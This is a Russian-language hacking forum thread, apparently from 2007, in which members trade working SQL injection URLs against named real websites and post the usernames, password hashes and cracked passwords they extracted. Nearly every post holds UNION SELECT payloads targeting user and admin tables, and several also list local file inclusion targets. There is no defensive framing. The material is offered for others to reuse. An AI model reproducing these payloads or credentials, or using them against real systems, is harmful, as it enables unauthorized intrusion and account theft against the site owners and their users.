SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Code:
    http://www.teacherxpress.com/cat.php?gid=-31+union+select+1,concat(username,0x3a,password),3+from+users/*
    patrick:7a2eb41a38a8f4e39c1586649da21e5f
     
  2. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    patrick:helen
     
  3. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    хмм у меня поиск не находит видать потому что в коде постишь :rolleyes:
    Вот нашел тока не пойму как ее заюзать? http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+from+users/*&remindway=mail&subm2.x=33&subm2.y=21 скуля в напоминание пароля, как вывести данные? :(
     
    #483 }{0TT@БЬ)Ч, 13 Feb 2007
    Last edited: 13 Feb 2007
  4. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Code:
    http://www.f1-world.ru/champ2007/testres.php3?id=-1+union+select+1,concat(username,char(58),userpwd),3,4+from+users/*
    admins:mikahakka
     
  5. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Вот держи:
    Code:
    http://www.vsetv.com/remindpass.php?rplogin=1'+union+select+password+from+users+limit+0,1/*&remindway=secretq&subm2.x=28&subm2.y=6
    andrey:asdfgh

    Данные выводятся под строкой "Секретный вопрос:" ;)
     
    #485 +StArT+, 13 Feb 2007
    Last edited: 13 Feb 2007
    1 person likes this.
  6. Gorn

    Gorn Member

    Joined:
    25 Oct 2006
    Messages:
    13
    Likes Received:
    8
    Reputations:
    2
    Вот, нарыл:
    _http://kava.lviv.ua/event/index.php?id=-1+union+select+login,password,3+from+admin/*
    _http://hockey.sport.com.ua/news.phtml?id=999999+union+select+username,password,3,4,5,6,7,8,9,10,11,12+from+users/*
    _http://www.yuretz.ru/prikol.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,11,12,13
    _http://www.lv.ukrtelecom.ua/ua/hot_news/?id=202
     
  7. Satirik

    Satirik Banned

    Joined:
    18 Aug 2005
    Messages:
    20
    Likes Received:
    12
    Reputations:
    0
    Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.
    Возможно некоторые не будут работать так как особо не вдавался в подробности. Не пинать )

    Code:
    http://www.startime.ru/rus/catalog.php?f='5eed087ad44807bca9394eb672be8e40
    Думаю покапаться будет интересно
    
    http://ckp.hut1.ru/index.php?akt=http://123
    локальный инклуд
    
    http://www.employment.ru/catalog/vi.php?pid='65
    Можно покапаться
    
    http://www.newastrakhan.ru/main.php?mode='fin
    Локальный инклуд
    
    http://adresov.net/search.php?q='
    Можно покапаться
     
  8. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    К чему в этом топе локальный инклуд? =\
     
  9. Satirik

    Satirik Banned

    Joined:
    18 Aug 2005
    Messages:
    20
    Likes Received:
    12
    Reputations:
    0
    я же специально написал ...***Возможно не все sql-инжекшн, но дабы не флудить пишу все тут.***
    Все равно сюда за *халявой* идут :)
     
    1 person likes this.
  10. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://www.startime.ru/rus/catalog.php?f=-99'+union+select+1,aes_decrypt(aes_encrypt(database(),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14/*

    http://www.employment.ru/catalog/vi.php?pid=-99+union+select+1,2,3,concat(username,0x3a,user_password),5,6,7,8,9,10,11,12,13,14,15,16,17+from+phpbb_users+limit+1,1/*
    etc...
    а инклуд на HUT'e вообще бред выкладывать =)
     
    2 people like this.
  11. Satirik

    Satirik Banned

    Joined:
    18 Aug 2005
    Messages:
    20
    Likes Received:
    12
    Reputations:
    0
    ок. Учту. + за вывод таблиц. Спасибо.
    Насчет хата я незаметил )
     
  12. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Аналогично
    Code:
    http://www.wargames.ru/article.php?sid=-1+union+select+1,2,3,4,5,concat(uname,0x3a,pass),null,uid,9,10,email+from+users+limit+1,1/*
    AlexCat:lb6T/pvYnxejM

    Судя по всему это "DES".
     
  13. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    почти всё инет-магазины
    таблицы не нашел, лоадфайла нет
    Code:
    __http://www.getethical.com/getethical_shop.php?id=-16+union+select+1,2,3,4/*&cat=Shoes%20and%20Trainers
    
    __http://www.zaishu.com/shop.php?id=17+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
    в этих подзапросы, просто ошибки скуля, фильтрация пробелов и прочие приколы, разбирать не стал
    Code:
    __http://shop.fightresource.com/viewproducts.php?id=-33'+union+select+1,2,3,4,5,6,7,8,8/*
    __http://www.ukrbiznes.com/website.php?id=47515'
    __http://www.airsideshop.com/product.php?id=-231'
    __http://www.stageagent.com/shows.php?id=686'+union+select+1,2/*
    __http://www.qi.com/shop/qicat.php?id=-202'+union+select+1,2/*
    __http://www.blackpoolpleasurebeach.com/shop/product.php?id=235'/*&typeid=5 
     
    #493 Thanat0z, 13 Feb 2007
    Last edited: 13 Feb 2007
    2 people like this.
  14. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Code:
    __http://www.mediapro.com.ua/news/text.php?id=-99+union+select+1,2,concat(username,0x3a,user_password),4,5,6,7,8+from+phpbb_users+limit+1,1/*
    admin:fa7f581027e58c9a5bcdbdc192d80c55
    admin:011076
    
    Code:
    __http://www.synco.ru/text.php?id=-99+union+select+999/*
    
    Code:
    __http://www.legionhardware.com/document.php?id=-99+union+select+1,2,3,4,5,6,7,8,concat(name,0x3a,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+users+limit+0,1/*
    
    =\
     
    #494 ice1k, 13 Feb 2007
    Last edited: 13 Feb 2007
  15. +StArT+

    +StArT+ Elder - Старейшина

    Joined:
    10 Feb 2007
    Messages:
    24
    Likes Received:
    51
    Reputations:
    3
    Code:
    http://svadba.irk.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
     
  16. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    _http://www.reflex.se/downloads.php?cat=1'
    _http://www.xtremepsp.com/downloads.php?cat=2'
     
    2 people like this.
  17. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    покажите реализацию, имхо здесь нет инъекций
     
  18. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    http://www.xtremepsp.com/downloads.php?cat=-99+union+select+1,user(),3,4,5,6,7,8/*
    etc...
     
    1 person likes this.
  19. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    а так круче http://www.xtremepsp.com/downloads.php?cat=-2+union+select+1,2,3,4,concat(name,char(58),password,char(58),email),6,7,8+from+members/* ;)
     
    1 person likes this.
  20. Thanat0z

    Thanat0z Негрин

    Joined:
    6 Dec 2006
    Messages:
    627
    Likes Received:
    498
    Reputations:
    311
    млин, а мне на 7 уже было влом перебирать :) (ленивая сволочь)
    держите плюсы

    Простите засранца :)
     
Thread Status:
Not open for further replies.